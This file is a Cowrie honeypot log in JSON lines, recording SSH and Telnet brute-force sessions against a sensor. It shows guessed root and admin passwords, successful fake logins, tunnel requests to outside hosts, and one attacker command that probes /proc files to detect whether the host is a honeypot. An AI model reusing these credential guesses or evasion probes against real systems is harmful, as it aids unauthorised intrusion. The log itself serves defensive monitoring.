{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52774,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e9834e80eff","protocol":"ssh","message":"New connection: 212.227.125.160:52774 (1.2.3.4:22) [session: 8e9834e80eff]","sensor":"my-vps","timestamp":"2025-08-28T18:06:06.987388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:06:07.016649Z","src_ip":"212.227.125.160","session":"8e9834e80eff"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:06:07.230051Z","src_ip":"212.227.125.160","session":"8e9834e80eff"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:06:09.912411Z","src_ip":"212.227.125.160","session":"8e9834e80eff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T18:06:10.181648Z","session":"8e9834e80eff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T18:06:10.953894Z","src_ip":"212.227.125.160","session":"8e9834e80eff"}
{"eventid":"cowrie.session.closed","duration":"18.4","message":"Connection lost after 18.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:06:25.348367Z","src_ip":"212.227.125.160","session":"8e9834e80eff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42908,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6ad9c71478","protocol":"ssh","message":"New connection: 212.227.235.229:42908 (1.2.3.4:22) [session: cc6ad9c71478]","sensor":"my-vps","timestamp":"2025-08-28T18:06:43.184033Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:06:43.185511Z","src_ip":"212.227.235.229","session":"cc6ad9c71478"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43210,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba137cee92b0","protocol":"ssh","message":"New connection: 212.227.235.229:43210 (1.2.3.4:22) [session: ba137cee92b0]","sensor":"my-vps","timestamp":"2025-08-28T18:06:43.376023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:06:43.376696Z","src_ip":"212.227.235.229","session":"ba137cee92b0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T18:06:43.537748Z","src_ip":"212.227.235.229","session":"ba137cee92b0"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:06:44.022451Z","src_ip":"212.227.235.229","session":"ba137cee92b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T18:06:44.184634Z","session":"ba137cee92b0"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":56248,"dst_ip":"1.2.3.4","dst_port":22,"session":"514b1a7bfc9d","protocol":"ssh","message":"New connection: 171.243.150.220:56248 (1.2.3.4:22) [session: 514b1a7bfc9d]","sensor":"my-vps","timestamp":"2025-08-28T18:06:45.231699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:06:46.020836Z","src_ip":"171.243.150.220","session":"514b1a7bfc9d"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":60426,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac4bda469f2b","protocol":"ssh","message":"New connection: 171.243.150.185:60426 (1.2.3.4:22) [session: ac4bda469f2b]","sensor":"my-vps","timestamp":"2025-08-28T18:06:47.423673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:06:47.425279Z","src_ip":"171.243.150.185","session":"ac4bda469f2b"}
{"eventid":"cowrie.session.connect","src_ip":"59.8.52.131","src_port":50662,"dst_ip":"1.2.3.4","dst_port":23,"session":"59d3fad1e2e9","protocol":"telnet","message":"New connection: 59.8.52.131:50662 (1.2.3.4:23) [session: 59d3fad1e2e9]","sensor":"my-vps","timestamp":"2025-08-28T18:06:52.827543Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:06:56.333032Z","src_ip":"171.243.150.185","session":"ac4bda469f2b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":48834,"dst_ip":"1.2.3.4","dst_port":22,"session":"786ee0e164a3","protocol":"ssh","message":"New connection: 199.195.253.95:48834 (1.2.3.4:22) [session: 786ee0e164a3]","sensor":"my-vps","timestamp":"2025-08-28T18:06:59.236287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:06:59.250780Z","src_ip":"199.195.253.95","session":"786ee0e164a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:06:59.336115Z","src_ip":"199.195.253.95","session":"786ee0e164a3"}
{"eventid":"cowrie.login.failed","username":"test","password":"1qazXSW@","message":"login attempt [test/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T18:06:59.766259Z","src_ip":"199.195.253.95","session":"786ee0e164a3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:01.003485Z","src_ip":"199.195.253.95","session":"786ee0e164a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48436,"dst_ip":"1.2.3.4","dst_port":22,"session":"49276e8f77b3","protocol":"ssh","message":"New connection: 212.227.125.160:48436 (1.2.3.4:22) [session: 49276e8f77b3]","sensor":"my-vps","timestamp":"2025-08-28T18:07:07.628397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:07:07.666960Z","src_ip":"212.227.125.160","session":"49276e8f77b3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:07:07.878533Z","src_ip":"212.227.125.160","session":"49276e8f77b3"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:13.256333Z","src_ip":"212.227.125.160","session":"49276e8f77b3"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:14.492853Z","src_ip":"212.227.125.160","session":"49276e8f77b3"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":7827,"dst_ip":"1.2.3.4","dst_port":22,"session":"91bc3d8c53ce","protocol":"ssh","message":"New connection: 80.94.95.112:7827 (1.2.3.4:22) [session: 91bc3d8c53ce]","sensor":"my-vps","timestamp":"2025-08-28T18:07:20.188419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:07:20.191375Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:07:20.221730Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28021993","message":"login attempt [admin/28021993] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:20.427273Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27121987","message":"login attempt [admin/27121987] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:21.460104Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27121984","message":"login attempt [admin/27121984] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:22.493366Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27101993","message":"login attempt [admin/27101993] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:23.525661Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.session.closed","duration":31.3717679977417,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:24.199244Z","src_ip":"59.8.52.131","session":"59d3fad1e2e9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27081983","message":"login attempt [admin/27081983] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:24.557358Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.session.connect","src_ip":"185.207.106.177","src_port":65344,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc224bdec622","protocol":"ssh","message":"New connection: 185.207.106.177:65344 (1.2.3.4:22) [session: fc224bdec622]","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.121767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.122713Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.136604Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.login.success","username":"root","password":"00000000","message":"login attempt [root/00000000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.179925Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:07:25.223953Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.224633Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
